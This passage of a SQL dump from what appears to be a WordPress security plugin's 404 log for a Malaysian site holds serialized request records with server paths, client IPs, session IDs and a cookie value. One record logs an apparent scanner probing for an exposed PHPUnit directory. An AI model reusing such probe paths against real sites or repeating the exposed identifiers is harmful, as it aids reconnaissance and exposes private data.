charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"371B1F97-0DFC-4758-BBB1-7790537AB45A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYhGG9gT8SLwZ2vcJZwmHgAAAA8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"60918\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYhGG9gT8SLwZ2vcJZwmHgAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569211932.0103\";s:12:\"REQUEST_TIME\";s:10:\"1569211932\";}}','notice','2019-09-23 04:12:13','2019-09-23 04:12:12',31086672,32899296,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26854,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"19-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"BD72E5EF-4DD1-4571-BB2F-04EA1C97F74A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"19-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYg-kNgT8SLwZ2vcJZwiIAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYg-kNgT8SLwZ2vcJZwiIAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569210256.6868\";s:12:\"REQUEST_TIME\";s:10:\"1569210256\";}}','notice','2019-09-23 03:44:18','2019-09-23 03:44:17',31097752,32908040,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26853,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"8E64299B-D31E-4A86-BD22-AEE002249860\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYg@NNgT8SLwZ2vcJZwhGAAAABY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"53336\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYg@NNgT8SLwZ2vcJZwhGAAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569209908.7428\";s:12:\"REQUEST_TIME\";s:10:\"1569209908\";}}','notice','2019-09-23 03:38:30','2019-09-23 03:38:29',31086264,32902048,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26852,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d02d1f4a22c810fd86f59935dd169e18\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/vendor/phpunit/phpunit/phpunit.xsd\";s:19:\"REDIRECT_SCRIPT_URL\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYg6vdgT8SLwZ2vcJZwfFQAAAAk\";s:12:\"REDIRECT_URL\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:11:\"REMOTE_ADDR\";s:11:\"104.41.45.4\";s:11:\"REMOTE_PORT\";s:4:\"1345\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:57:\"https://bintara.com.my/vendor/phpunit/phpunit/phpunit.xsd\";s:10:\"SCRIPT_URL\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYg6vdgT8SLwZ2vcJZwfFQAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569209021.524\";s:12:\"REQUEST_TIME\";s:10:\"1569209021\";}}','notice','2019-09-23 03:23:43','2019-09-23 03:23:41',30753128,32564192,'https://bintara.com.my/vendor/phpunit/phpunit/phpunit.xsd',1,0,'104.41.45.4'),(26851,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4A6890B7-34D9-489F-BCBC-F41A62A3C4CB\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYg0Wrp66oO1SlzUVT6UIgAAAc4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"54063\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYg0Wrp66oO1SlzUVT6UIgAAAc4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569207386.2236\";s:12:\"REQUEST_TIME\";s:10:\"1569207386\";}}','notice','2019-09-23 02:56:28','2019-09-23 02:56:26',31082416,32896616,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26850,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/B08C390C\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.12\";s:11:\"REMOTE_PORT\";s:5:\"46051\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgr5bp66oO1SlzUVT6QhgAAAdI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569205221.8657\";s:12:\"REQUEST_TIME\";s:10:\"1569205221\";}}','notice','2019-09-23 02:20:23','2019-09-23 02:20:22',30812640,32638672,'https://bintara.com.my/?page_id=11',1,0,'223.206.243.12'),(26849,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3371.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgrPbp66oO1SlzUVT6QVwAAAcU\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.106.242\";s:11:\"REMOTE_PORT\";s:5:\"54280\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgrPbp66oO1SlzUVT6QVwAAAcU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569205053.9711\";s:12:\"REQUEST_TIME\";s:10:\"1569205053\";}}','notice','2019-09-23 02:17:35','2019-09-23 02:17:34',30752120,32564800,'https://bintara.com.my/our-history/about1/',1,0,'27.102.106.242'),(26848,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:136:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"119.235.48.205\";s:11:\"REMOTE_PORT\";s:5:\"37456\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgnhdgT8SLwZ2vcJZwUfQAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569204101.5768\";s:12:\"REQUEST_TIME\";s:10:\"1569204101\";}}','notice','2019-09-23 02:01:43','2019-09-23 